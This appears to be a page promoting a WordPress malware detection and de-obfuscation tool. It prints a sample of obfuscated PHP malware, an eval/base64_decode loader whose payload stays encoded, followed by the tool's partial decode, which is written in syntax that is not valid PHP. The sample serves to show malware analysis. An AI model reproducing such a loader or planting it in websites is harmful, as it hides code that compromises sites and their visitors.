De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0} .$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36} .$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30}; eval($O00O0O("JE8wTzAwMD0iY2RWQ3lXUmVBa3ZycWlCVEV0TVFaUGFZc2hOdXp3WFNETHhKb0dLZmJqbW5nSUZIbE9VcE9iZFlXakRQY3lxbnNKckNSdVpsS2hURnB2a0JOaUVMZVFtSUF3Zk16VlVHZ1h4SGF0U29oZTlpVEhjZllKOHFYd2tXS2p4MEtqbGdGR0dWZ1hlVmduZVZnc1ZWZzdoVmc3cVZnNEhWZzZoVmc3aFZnN3FWZzRlVmc3WmZZR2thTzNrb3oyNU1PM0R2T0dsQWZDcGZZSkRXT3d4MFRlUmdoTHJ6WEpjQlFXWHBYWVhnUWFtT1hhMDdZSkRXT3d4MFRlWGdoTHJ6WEpjQlFKOEpRWWNKWFk0QkV4aUpFQ3BmWVVhVVhZZ3lFMXJoUzFEelhVa3VLWUliZkxyN1lKY2dYWWN5RjIxeWhMY3lFMXJoUzFEelhVa3VLWUlidGlBZ1hZY2dRVy9HVTdWYW43N1ZnNUhWZ25HVmdUN0dxVDdWZ0YzVVY1cVZnRmdmWFljZ1hZRFZ6amxnaExyTmJISU1PVWRpend4VktMY0FJSElpRkVEQVpMaWdYSmNKUUdEV1RqMEFJeDlDRGRrQ0xTOXRqV0lpRkVEQVhhMG9RSklPRVlYcFhZRFZ6amxvdGlBZ1hZY2dJd2t1S1ljOVhIazBPYTlXS0VycEZqa2FYWWd5T0dydmJ3Z1dRWWNKWFlYQmJISW96TGd5RTFreFMxa0lDMDV6WEdydmJ3Z0pFTHlCWGFtT1FKNU9FWVhwWFlEVnpqbG90aUFnWFljZ0l3a3VLWWM5WEhrME9hOVdLRXJwRmprYVhZZ0p0YW1PRXhpSlFZY0p0YW1PWEppZ0l3a3VLWXk3WUpjZ1hZcm9LSmNBSXg5bEMxa1NqV0lWempsSkVMYzloQzBnWEdrYU8za296MjVNT1VkTktFbEpmTHI3WUpjZ1hZY2dYWWNnUVc5TktFa05UajlCRTNJYU8yZDA0NHdBNUZqYTVGc3o0NHdLNDRmUTQ0d0M0NHdBNDR3RzQ0dHM0NGY3NDR0ZTQ0dFg0NHdLNDRmUVlKY2dYWWNnWFljZ0l4OUNEZGtDTFM5dFhlMGdqMTA3WUpjZ1hZcjlYd2RwTzJkb0tKY0FPSElhSzE5dUZFRFZUWWdKUTE1Vkt4bU5RMnlKUVljeUUxcmhTMUR6WFVrdUtZSWJmTHlnUGlBZ1hZY2dYWWNnWFk4cVh3a3lYdHRZcCt0ZUdCdGVwK3RlSlB0cm8rdFlzK3RlbnR0ZXArdGVKdHRldit0WUErdGVudHRZbit0ZUp0dGVzQnRZeUJUenV0VGpwY0FnWFljZ1hZY2dYWURNUzBkQ1MwYWhDYXBKVHdhTmJ3OVdQTEliWFk0OVhZRE1TMGRDUzBhaENhcEpPd3gwVFlJYlFKWDhGR1graEpYQkl4OWxDMWtTaldJVnpqbEpFTDRKaHdJV2hKWDdZSmNnWFljZ1hZY2dJeDlDRGRrQ0xTOXRqV0lpRkVEQVhhMGdoTHJOVHdkcHp4OWFQd2RWZllEVnpqbEJYSmNVWFJyVktZWG90aUFnWFljZ01McmF6SGthWEhwZlhZY2dYWWNnWFljeUUxa3hTMWtJQzA1elhVdm9PM0RxT0d5SkVMY0JoTGN5RTFreFMxa0lDMDV6WEdydmJ3Z0pFTDRKaHdJV2hWNEpRSkRNU1I5Q2R4cEpGMjF5WGEwQlhWbUpPVjQ4T0hJYWhKWEJUSER1ekhraUtqa29Gam1WVHd4V09XdnVGYTlWejI1MktFSTBFMmRCRjI5eVRqNUdmSGtBS2ptcEUyZDRLalpBSXdrdUtZeXBYWUlkZFJGdXRZWG9RWXJ4Q2FETVNkZGhkUmRDUVljSmRkRHdRQ2dKUVlyME9HZGFmTDRKaFk5aU9VUytYVnBmWFljZ1hIMGZNbEEvaGdBOFhTRGhsMURLU1JTZ1RIRHV6ZTRmaHd2MHpqaWd6d3hCS04wSlRVUkpoZ0E4VHdkdktlNGZYWWNnWGVtdUtFRHZYd2tBRkVJTktFbDlYYWRTREowNFhWNGZYWWNnWGVtMFRFRHBLQzVFS2pJQ1R3ZHB6ZWlxYndhMHp3UytZVmlxVHdkdktlNGZod0lxS0h5K1lKY2dYWWM4aDNyQU9ZY2ZYWWNnWFljZ1hZcm9LSmNBS2oxaWJIeUFJeDlDRGRrQ0xTOXRqV0lBVEVrMHozSTVYYTBvZkxjeUUxa3hTMWtJQzA1elhVdm9PM0RxT0d5SkVMYzlYWVhKdGlBZ1hZY2dYWWNnWHdhVVhZdmF6RXIwUExneUUxa3hTMWtJQzA1elhHcnZid2dKRUx5b1hZRE1TMGRDUzBhaENhcEpPd3gwVFlJYlhlMGdPMnZhendtTUtFdmFGV2dKbHdreVhKeTdZSmNnWFljZ1hZY2dLamtBeldjeUUxa3hTMWtJQzA1elhVdm9PM0RxT0d5SkVDcGdYWWNnWUpjZ1hZY2dYWWNnS2prQXpXY3lFMWt4UzFrSUMwNXpYR3J2YndnSkVMY2ZYWWNnWGU4K1lKY2dYWWM4S1U5V3pMcnVLRURBejJsOVhhcmhTMWxKaGdBZ1hZY2dYWWNnWGU0OFRqNWliRWxnRkVkMHoyS3FGM2ROWEhENU93UzlYR0RhUEhsSlh3NXZ6alM5WFVrdUtZWCtZSmNnWFljOFEyS3FPVTArWVZpcUZVOXlQQzRmaFk5QWJ3MXBoZz09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));?>
<?php $O00OO0 = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"; $O00O0O = "base"; $O0OO00 = "strtr"; $OO0O00 = "substr"; $OO0000 = "52"; $O00O0O = "base64_decode"; eval { $O0O000 = "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"; eval('?>' . base64_decode(strtr(substr($O0O000, 104), substr($O0O000, $OO0000, $OO0000), substr($O0O000, 0, $OO0000)))); };
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.